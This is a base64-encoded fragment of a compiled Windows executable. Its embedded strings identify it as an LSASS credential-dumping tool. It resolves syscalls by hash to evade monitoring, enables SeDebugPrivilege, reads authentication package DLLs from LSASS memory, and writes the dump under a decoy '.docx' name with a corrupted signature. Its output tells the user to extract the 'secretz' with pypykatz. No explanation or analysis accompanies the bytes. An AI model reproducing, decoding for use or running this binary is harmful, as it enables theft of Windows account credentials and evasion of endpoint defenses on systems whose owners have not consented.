AAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAAQAAAAMO////APwAAAQAAAAAAAAAOAAAAAAAAAAAAAADAEUEAAAAAAAAAAAAAAAAAEKZAAAAAAAAAAAAAAAAAADCmQAAAAAAAQKZAAAAAAADApkAAAAAAAFCmQAAAAAAAIKdAAAAAAAAAAAAAAAAAADCnQAAAAAAAAAAAAAAAAABAp0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTVzJfUG9wdWxhdGVTeXNjYWxsTGlzdCBmYWlsZWQKAHN5c2NhbGwgd2l0aCBoYXNoIDB4JWx4IG5vdCBmb3VuZAoAAAAAAABUaGUgZHVtcCBpcyB0b28gYmlnLiBJbmNyZWFzZSBEVU1QX01BWF9TSVpFLgoAAABGYWlsZWQgdG8gY2FsbCBIZWFwQWxsb2MgZm9yIDB4JXggYnl0ZXMsIGVycm9yOiAlbGQKAABcAD8APwBcAAAAVGhlIHBhdGggJyVzJyBpcyBpbnZhbGlkLgoAAAAAAABGYWlsZWQgdG8gY2FsbCBOdENyZWF0ZUZpbGUsIHN0YXR1czogMHglbHgKAAAAAABGYWlsZWQgdG8gY2FsbCBOdFdyaXRlRmlsZSwgc3RhdHVzOiAweCVseAoAAAAAAABTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlAAAAAAAAAAAARmFpbGVkIHRvIGNhbGwgTG9va3VwUHJpdmlsZWdlVmFsdWVXLCBlcnJvcjogJWxkCgAAAAAAAABGYWlsZWQgdG8gY2FsbCBOdE9wZW5Qcm9jZXNzVG9rZW4sIHN0YXR1czogMHglbHgKAAAAAAAAAEZhaWxlZCB0byBjYWxsIE50QWRqdXN0UHJpdmlsZWdlc1Rva2VuLCBzdGF0dXM6IDB4JWx4CgAAVGhlcmUgaXMgbm8gcHJvY2VzcyB3aXRoIHRoZSBQSUQgJWxkLgoAAENvdWxkIG5vdCBvcGVuIGEgaGFuZGxlIHRvICVsZAoARmFpbGVkIHRvIGNhbGwgTnRPcGVuUHJvY2Vzcywgc3RhdHVzOiAweCVseAoAAAAARmFpbGVkIHRvIGNhbGwgTnRRdWVyeUluZm9ybWF0aW9uUHJvY2Vzcywgc3RhdHVzOiAweCVseAoAAAAAAAAAAEZhaWxlZCB0byBjYWxsIE50UmVhZFZpcnR1YWxNZW1vcnksIHN0YXR1czogMHglbHgKAABsAHMAYQBzAHIAdgAuAGQAbABsAAAAAAAAAAAAVGhpcyBzZWxlY3RlZCBwcm9jZXNzIGlzIG5vdCBMU0FTUy4KAABtAHMAdgAxAF8AMAAuAGQAbABsAAAAdABzAHAAawBnAC4AZABsAGwAAAB3AGQAaQBnAGUAcwB0AC4AZABsAGwAAABrAGUAcgBiAGUAcgBvAHMALgBkAGwAbAAAAGwAaQB2AGUAcwBzAHAALgBkAGwAbAAAAGQAcABhAHAAaQBzAHIAdgAuAGQAbABsAAAAawBkAGMAcwB2AGMALgBkAGwAbAAAAGMAcgB5AHAAdABkAGwAbAAuAGQAbABsAAAAbABzAGEAZABiAC4AZABsAGwAAABzAGEAbQBzAHIAdgAuAGQAbABsAAAAcgBzAGEAZQBuAGgALgBkAGwAbAAAAG4AYwByAHkAcAB0AC4AZABsAGwAAABuAGMAcgB5AHAAdABwAHIAbwB2AC4AZABsAGwAAABlAHYAZQBuAHQAbABvAGcALgBkAGwAbAAAAHcAZQB2AHQAcwB2AGMALgBkAGwAbAAAAHQAZQByAG0AcwByAHYALgBkAGwAbAAAAGMAbABvAHUAZABhAHAALgBkAGwAbAAAAAAAAAAAAEZhaWxlZCB0byBjYWxsIEhlYXBBbGxvYyBmb3IgMHglbGx4IGJ5dGVzLCBlcnJvcjogJWxkCgAARmFpbGVkIHRvIGNhbGwgTnRSZWFkVmlydHVhbE1lbW9yeSwgc3RhdHVzOiAweCVseC4gQ29udGludWluZyBhbnl3YXlzLi4uCgAAAAAAAABUaGUgTFNBU1MgcHJvY2VzcyB3YXMgbm90IGZvdW5kLgoAAAAAAAAARmFpbGVkIH
RvIGNhbGwgTnRHZXROZXh0UHJvY2Vzcywgc3RhdHVzOiAweCVseAoAbABzAGEAcwBzAC4AZQB4AGUAAAAAAAAAdXNhZ2U6ICVzIC0td3JpdGUgQzpcV2luZG93c1xUZW1wXGRvYy5kb2N4IFstLXZhbGlkXSBbLS1waWQgMTIzNF0gWy0taGVscF0KACAgICAtLXdyaXRlIFBBVEgsIC13IFBBVEgKAAAgICAgICAgICAgICBmdWxsIHBhdGggdG8gdGhlIGR1bXBmaWxlCgAgICAgLS12YWxpZCwgLXYKACAgICAgICAgICAgIGNyZWF0ZSBhIGR1bXAgd2l0aCBhIHZhbGlkIHNpZ25hdHVyZSAob3B0aW9uYWwpCgAgICAgLS1waWQgUElELCAtcCBQSUQKAAAAAAAgICAgICAgICAgICB0aGUgUElEIG9mIExTQVNTIChvcHRpb25hbCkKACAgICAtLWhlbHAsIC1oCgAAAAAAAAAAICAgICAgICAgICAgcHJpbnQgdGhpcyBoZWxwIG1lc3NhZ2UgYW5kIGxlYXZlAFBNRE0ALXYALS12YWxpZAAtdwAtLXdyaXRlAC1wAC0tcGlkAC1oAC0taGVscABpbnZhbGlkIGFyZ3VtZW50OiAlcwoAAAAAAAAAWW91IG11c3QgcHJvdmlkZSBhIGZ1bGwgcGF0aDogJXMAAAAAAAAAAENvdWxkIG5vdCBlbmFibGUgJ1NlRGVidWdQcml2aWxlZ2UnLCBjb250aW51aW5nIGFueXdheXMuLi4KAAAAAABDb3VsZCBub3QgYWxsb2NhdGUgZW5vdWdoIG1lbW9yeSB0byB3cml0ZSB0aGUgZHVtcAAAAAAAAEZhaWxlZCB0byBjYWxsIE50RnJlZVZpcnR1YWxNZW1vcnksIHN0YXR1czogMHglbHgKAAAAAAAAVGhlIG1pbmlkdW1wIGhhcyBhbiBpbnZhbGlkIHNpZ25hdHVyZSwgcmVzdG9yZSBpdCBydW5uaW5nOgpiYXNoIHJlc3RvcmVfc2lnbmF0dXJlLnNoICVzCgAAAAAAAAAARG9uZSwgdG8gZ2V0IHRoZSBzZWNyZXR6IHJ1bjoKcHl0aG9uMyAtbSBweXB5a2F0eiBsc2EgbWluaWR1bXAgJXMKAAAAAAAAAAAAAAAAAADQQkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQQAAAAAACEBBAAAAAACcEEEAAAAAAEAwQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVbmtub3duIGVycm9yAAAAQXJndW1lbnQgZG9tYWluIGVycm9yIChET01BSU4pAABPdmVyZmxvdyByYW5nZSBlcnJvciAoT1ZFUkZMT1cpAFBhcnRpYWwgbG9zcyBvZiBzaWduaWZpY2FuY2UgKFBMT1NTKQAAAABUb3RhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoVExPU1MpAAAAAAAAVGhlIHJlc3VsdCBpcyB0b28gc21hbGwgdG8gYmUgcmVwcmVzZW50ZWQgKFVOREVSRkxPVykAQXJndW1lbnQgc2luZ3VsYXJpdHkgKFNJR04pAAAAAAAAAF9tYXRoZXJyKCk6ICVzIGluICVzKCVnLCAlZykgIChyZXR2YWw9JWcpCgAA2Gn//4xp//8kaf//rGn//7xp///Maf//nGn//01pbmd3LXc2NCBydW50aW1lIGZhaWx1cmU6CgAAAAAAQWRkcmVzcyAlcCBoYXMgbm8gaW1hZ2Utc2VjdGlvbgAgIFZpcnR1YWxRdWVyeSBmYWlsZWQgZm9yICVkIGJ5dGVzIGF0IGFkZHJlc3MgJXAAAAAAAAAAACAgVmlydHVhbFByb3RlY3QgZmFpbGVkIHdpdGggY29kZSAweCV4AAAgIFVua25vd24gcHNldWRvIHJlbG9jYXRpb24gcHJvdG9jb2
wgdmVyc2lvbiAlZC4KAAAAAAAAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBiaXQgc2l6ZSAlZC4KAAAAAAAAAAAAAAAAAAAAoG7//6Bu//+gbv//oG7//6Bu//8Ibv//oG7//9Bu//8Ibv//M27//wAAAAAAAAAAKG51bGwpAE5hTgBJbmYAACgAbgB1AGwAbAApAAAAAADSmf//2JP//9iT///smf//2JP///SY///Yk///C5n//9iT///Yk///gJn//7yZ///Yk///h5f//6CX///Yk///vJf//9iT///Yk///2JP//9iT///Yk///2JP//9iT///Yk///2JP//9iT///Yk///2JP//9iT///Yk///2JP//9iT///cl///2JP//xSY///Yk///TJj//4SY//+8mP//2JP//0KW///Yk///2JP//3CX///Yk///2JP//9iT///Yk///2JP//9iT//8Jmv//2JP//9iT///Yk///2JP//1CU///Yk///2JP//9iT///Yk///2JP//9iT///Yk///2JP//8qV///Yk///R5X//8CU//9qlv//AJf//ziX//+ilv//wJT//6iU///Yk///wpb//+KW//+Mlf//UJT//wKW///Yk///2JP//xuV//+olP//UJT//9iT///Yk///UJT//9iT//+olP//AAAAAEluZmluaXR5AE5hTgAwAAAAAAAAAAD4P2FDb2Onh9I/s8hgiyiKxj/7eZ9QE0TTPwT6fZ0WLZQ8MlpHVRNE0z8AAAAAAADwPwAAAAAAACRAAAAAAAAACEAAAAAAAAAcQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAA4D8AAAAAAAAAAAUAAAAZAAAAfQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8D8AAAAAAAAkQAAAAAAAAFlAAAAAAABAj0AAAAAAAIjDQAAAAAAAavhAAAAAAICELkEAAAAA0BJjQQAAAACE15dBAAAAAGXNzUEAAAAgX6ACQgAAAOh2SDdCAAAAopQabUIAAEDlnDCiQgAAkB7EvNZCAAA0JvVrDEMAgOA3ecNBQwCg2IVXNHZDAMhOZ23Bq0MAPZFg5FjhQ0CMtXgdrxVEUO/i1uQaS0SS1U0Gz/CARAAAAAAAAAAAvInYl7LSnD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CQTAAAck0AAIQCAQCATQAArE0AAIwCAQCwTQAA/00AAJACAQAATgAAn04AAJQCAQCgTgAAGE8AAKACAQAgTwAAWU8AAKQCAQBgTwAAy08AAKgCAQDQTwAABlAAAKwCAQAQUAAAl1AAALACAQCgUAAAXlEAALQCAQCgUQAAx1EAALgCAQDQUQAAF1IAALwCAQAgUgAAM1MAAMgCAQBAUwAAl1MAANACAQCgUwAA+FQAANgCAQAAVQAAMFYAAOwCAQAwVgAAd1YAAPgCAQCAVgAALVcAAAQDAQAwVwAAT1wAAAwDAQBQXAAA/F8AACQDAQAAYAAAYGEAADwDAQBgYQAAEWUAAFADAQAgZQAAAGYAAGADAQAAZgAAsGYAAGwDAQCwZgAAmGcAAHgDAQCgZwAAEGkAAIQDAQAQaQAAW24AAJADAQBgbgAAB3gAAKQDAQAQeAAAR3gAALwDAQBQeAAAzHgAAMQDAQDQeAAA7HgAANADAQDweAAAZnoAANQDAQBwegAAMJEAAOwDAQAwkQAAJZIAAAgEAQAwkgAAc5IAABgEAQCAkgAAXJMAABwEAQBgkwAAopMAACgEAQCwkwAAopQAADAEAQCwlAAAFJUAADwEAQAglQAAzZUAAEQEAQDQlQAAjZYAAFQEAQCQlgAA6ZcAAFwEAQDwlwAA8JkAAHQEAQDwmQAA/poAAIgEAQAAmwAAUJsAAJwEAQBQmwAAFZ0AAKAEAQAgnQAAOJ4AALAEAQBAngAASZ8AALgEAQBQnwAAep8AAMQEAQCAnwAAqJ8AAMgEAQ
DQoAAATaIAAMwEAQBQogAAuKIAANgEAQDAogAAxaMAAOgEAQDQowAAKqQAAPwEAQAwpAAAuaQAAAwFAQDApAAAAaUAABQFAQAQpQAABqYAACAFAQAQpgAAL6YAADQFAQAwpgAAOKYAADwFAQBApgAAS6YAAEAFAQBQpgAAt6YAAEQFAQDApgAAIKcAAEwFAQAgpwAAK6cAAFQFAQAwpwAAO6cAAFgFAQBApwAAS6cAAFwFAQAgqAAAJagAAGAFAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQQBAARCAAABBAEABGIAAAEPCAAPARMACDAHYAZwBVAEwALQCQQBAARCAADIoAAAAQAAAMQUAADXFAAAUEkAANcUAAAJBAEABEIAAMigAAABAAAA5BQAAPcUAABQSQAA9xQAAAEEAQAEQgAAAQAAAAEAAAABDgSFDgMGYgIwAVABCAMFCDIEAwFQAAABCAMFCBIEAwFQAAABEQWFEQMJARkAAjABUAAAAQgDBQhSBAMBUAAAAQgDBQhSBAMBUAAAAQgDBQgyBAMBUAAAARAEhRADCAGcAAFQAQgDBQiyBAMBUAAAAQgDBQjSBAMBUAAAAQQCBQQDAVABCAMFCNIEAwFQAAABDgSFDgMGYgIwAVABCAMFCLIEAwFQAAABCwQFCwEcAAQDAVABCAMFCNIEAwFQAAABEASFEAMIAWAAAVABEASFEAMIAToAAVABCAMFCJIEAwFQAAABCAMFCBIEAwFQAAABCwQFCwEWAAQDAVABDgSFDgMG4gIwAVABCAMFCFIEAwFQAAABCAMFCJIEAwFQAAABBAIFBAMBUAEIAwUIMgQDAVAAAAEIAwUIUgQDAVAAAAENBgUNARIABgMDYAJwAVABBAEABEIAAAEGAwAGQgIwAWAAAAEAAAABAAAAAQAAAAEEAQAEQgAAAQYDAAZCAjABYAAAAQAAAAEWCQAWiAYAEHgFAAtoBAAG4gIwAWAAAAEAAAABBwMAB2IDMALAAAABCAQACJIEMANgAsABGAqFGAMQYgwwC2AKcAnAB9AF4APwAVABBAEABKIAAAEAAAABBgIABjICwAEJBQAJQgUwBGADcALAAAABBwQABzIDMAJgAXABBQIABTIBMAEFAgAFMgEwAQAAAAEAAAABCAQACDIEMANgAsABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQkEAAlSBTAEwALQAQQBAASiAAABBQIABTIBMAEOCAAOcgowCWAIcAdQBsAE0ALgAQcEAAcyAzACYAFwAQcDAAdCAzACwAAAAQQBAARiAAABGAqFGAMQYgwwC2AKcAnAB9AF4APwAVABGAqFGAMQQgwwC2AKcAnAB9AF4APwAVABDQcFDVIJAwYwBWAEcAPAAVAAAAEIBQAIQgQwA2ACcAFQAAABCQQACTIFMATAAtABBwMAB8IDMALAAAABBwMAB8IDMALAAAABCAQACLIEMANgAsABDAcADKIIMAdgBnAFUATAAtAAAAETCgATARUADDALYApwCVAIwAbQBOAC8AEFAgAFMgEwAQcEAAcyAzACYAFwAQAAAAEQCQAQYgwwC2AKcAlQCMAG0ATgAvAAAAEbDAAbaAoAEwEXAAwwC2AKcAlQCMAG0ATgAvABBgUABjAFYARwA1ACwAAAAQAAAAEGAwAGQgIwAWAAAAEFAgAFMgEwAQYDAAZiAjABYAAAAQYCAAYyAsABCgUACkIGMAVgBMAC0AAAAQUCAAVSATABEAkAEEIMMAtgCnAJUAjABtAE4ALwAAABDggADjIKMAlgCHAHUAbABNAC4AEOCAAOMgowCWAIcAdQBsAE0ALgAQAAAAEKBgAKMgYwBWAEcANQAsABAwIAAzACwAEHBAAHMgMwAmABcAEAAAABAAAAAQYDAAaCAj
ABcAAAAQsGAAtyBzAGYAVwBMAC0AEOCAAOcgowCWAIcAdQBsAE0ALgAQkFAAmCBTAEYANwAsAAAAEEAQAEogAAAQgEAAhSBDADYALAAQ4IAA5SCjAJYAhwB1AGwATQAuABBQIABTIBMAEAAAABAAAAAQUCAAUyATABBQIABTIBMAEAAAABAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQIAEAAAAAAAAAAADkJwEAYCIBAGAgAQAAAAAAAAAAADgoAQBwIgEA8CABAAAAAAAAAAAA/CgBAAAjAQAAAAAAAAAAAAAAAAAAAAAAAAAAAHAkAQAAAAAAAAAAAAAAAACIJAEAAAAAAKAkAQAAAAAAuCQBAAAAAADIJAEAAAAAANokAQAAAAAA7CQBAAAAAAD4JAEAAAAAAAQlAQAAAAAAICUBAAAAAAA0JQEAAAAAAEwlAQAAAAAAYiUBAAAAAACAJQEAAAAAAIglAQAAAAAAliUBAAAAAACoJQEAAAAAALglAQAAAAAAAAAAAAAAAADOJQEAAAAAAOYlAQAAAAAA/CUBAAAAAAASJgEAAAAAACImAQAAAAAALiYBAAAAAAA8JgEAAAAAAEwmAQAAAAAAXiYBAAAAAAByJgEAAAAAAHwmAQAAAAAAiiYBAAAAAACUJgEAAAAAAKAmAQAAAAAAqiYBAAAAAAC0JgEAAAAAAMAmAQAAAAAAyCYBAAAAAADSJgEAAAAAANwmAQAAAAAA5iYBAAAAAADyJgEAAAAAAPomAQAAAAAAAicBAAAAAAAMJwEAAAAAABQnAQAAAAAAHicBAAAAAAAmJwEAAAAAAC4nAQAAAAAAOCcBAAAAAABGJwEAAAAAAFAnAQAAAAAAXCcBAAAAAABmJwEAAAAAAHAnAQAAAAAAeCcBAAAAAACCJwEAAAAAAIonAQAAAAAAlicBAAAAAACgJwEAAAAAAKonAQAAAAAAtCcBAAAAAADAJwEAAAAAAMonAQAAAAAA1CcBAAAAAAAAAAAAAAAAAHAkAQAAAAAAAAAAAAAAAACIJAEAAAAAAKAkAQAAAAAAuCQBAAAAAADIJAEAAAAAANokAQAAAAAA7CQBAAAAAAD4JAEAAAAAAAQlAQAAAAAAICUBAAAAAAA0JQEAAAAAAEwlAQAAAAAAYiUBAAAAAACAJQEAAAAAAIglAQAAAAAAliUBAAAAAACoJQEAAAAAALglAQAAAAAAAAAAAAAAAADOJQEAAAAAAOYlAQAAAAAA/CUBAAAAAAASJgEAAAAAACImAQAAAAAALiYBAAAAAAA8JgEAAAAAAEwmAQAAAAAAXiYBAAAAAAByJgEAAAAAAHwmAQAAAAAAiiYBAAAAAACUJgEAAAAAAKAmAQAAAAAAqiYBAAAAAAC0JgEAAAAAAMAmAQAAAAAAyCYBAAAAAADSJgEAAAAAANwmAQAAAAAA5iYBAAAAAADyJgEAAAAAAPomAQAAAAAAAicBAAAAAAAMJwEAAAAAABQnAQAAAAAAHicBAAAAAAAmJwEAAAAAAC4nAQAAAAAAOCcBAAAAAABGJwEAAAAAAFAnAQAAAAAAXCcBAAAAAABmJwEAAAAAAHAnAQAAAAAAeCcBAAAAAACCJwEAAAAAAIonAQAAAAAAlicBAAAAAACgJwEAAAAAAKonAQAAAAAAtCcBAAAAAADAJwEAAAAAAMonAQAAAAAA1CcBAAAAAAAAAAAAAAAAAJgFTG9va3VwUHJpdmlsZWdlVmFsdWVXABsBRGVsZXRlQ3JpdGljYWxTZWN0aW9uAD8BRW50ZXJDcml0aWNhbF
NlY3Rpb24AAHYCR2V0TGFzdEVycm9yAADMAkdldFByb2Nlc3NIZWFwAADnAkdldFN0YXJ0dXBJbmZvQQBfA0hlYXBBbGxvYwBlA0hlYXBGcmVlAAB8A0luaXRpYWxpemVDcml0aWNhbFNlY3Rpb24AlwNJc0RCQ1NMZWFkQnl0ZUV4AADYA0xlYXZlQ3JpdGljYWxTZWN0aW9uAAAMBE11bHRpQnl0ZVRvV2lkZUNoYXIAcgVTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAggVTbGVlcAClBVRsc0dldFZhbHVlANQFVmlydHVhbFByb3RlY3QAANYFVmlydHVhbFF1ZXJ5AAALBldpZGVDaGFyVG9NdWx0aUJ5dGUAOABfX0Nfc3BlY2lmaWNfaGFuZGxlcgAAQABfX19sY19jb2RlcGFnZV9mdW5jAEMAX19fbWJfY3VyX21heF9mdW5jAABSAF9fZ2V0bWFpbmFyZ3MAUwBfX2luaXRlbnYAVABfX2lvYl9mdW5jAABbAF9fbGNvbnZfaW5pdAAAYQBfX3NldF9hcHBfdHlwZQAAYwBfX3NldHVzZXJtYXRoZXJyAAByAF9hY21kbG4AeQBfYW1zZ19leGl0AACLAF9jZXhpdAAAlwBfY29tbW9kZQAAvgBfZXJybm8AANwAX2Ztb2RlAAAdAV9pbml0dGVybQCDAV9sb2NrACkCX29uZXhpdAC1Al90aW1lNjQAygJfdW5sb2NrAAwDX3djc2ljbXAAAIoDYWJvcnQAlwNhdG9pAACbA2NhbGxvYwAAqANleGl0AAC8A2ZwcmludGYAvgNmcHV0YwDDA2ZyZWUAANADZndyaXRlAAD5A2xvY2FsZWNvbnYAAP8DbWFsbG9jAAACBG1ic3Rvd2NzAAAHBG1lbWNweQAACQRtZW1zZXQAABsEcmFuZAAAJwRzaWduYWwAADAEc3JhbmQAPARzdHJlcnJvcgAAPgRzdHJsZW4AAEEEc3RybmNtcABFBHN0cnJjaHIAYwR2ZnByaW50ZgAAeQR3Y3NjcHkAAH0Ed2NzbGVuAAB+BHdjc25jYXQAAAAAIAEAQURWQVBJMzIuZGxsAAAAABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAFCABABQgAQAUIAEAS0VSTkVMMzIuZGxsAAAAACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoIAEAKCABACggAQAoI